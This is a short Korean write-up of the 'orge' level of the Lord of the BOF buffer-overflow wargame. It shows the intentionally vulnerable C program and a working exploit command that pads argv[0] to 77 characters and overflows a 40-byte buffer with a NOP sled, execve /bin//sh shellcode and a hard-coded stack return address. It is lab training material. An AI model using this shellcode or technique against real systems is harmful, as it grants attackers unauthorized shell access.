[LOB] darkelf -> orge

/*
        The Lord of the BOF : The Fellowship of the BOF
        - orge
        - check argv[0]
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    // here is changed!
    if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
    }
 
    // egghunter 
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 0, 40);
}
 

시작

저번과 같다. 버퍼,환경변수를 다 지워주고 argv[1]의 길이가 48을 넘으면 안된다.

바뀐점은 argv[0]의 길이가 77이여야한다는 것이다. 그렇지않으면 exit된다. 

argv[0]은 실행프로그램 이름으로 ... 실행할때 .////////orge 이런식으로 입력해서 길이를 늘릴수 있다.

.`python -c 'print("/"*72)'`orge 

argv[1]의 주소 , 0xbffffb84

payload : .`python -c 'print("/"*72)'`orge `python -c 'print("\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x84\xfb\xff\xbf")'`

클리어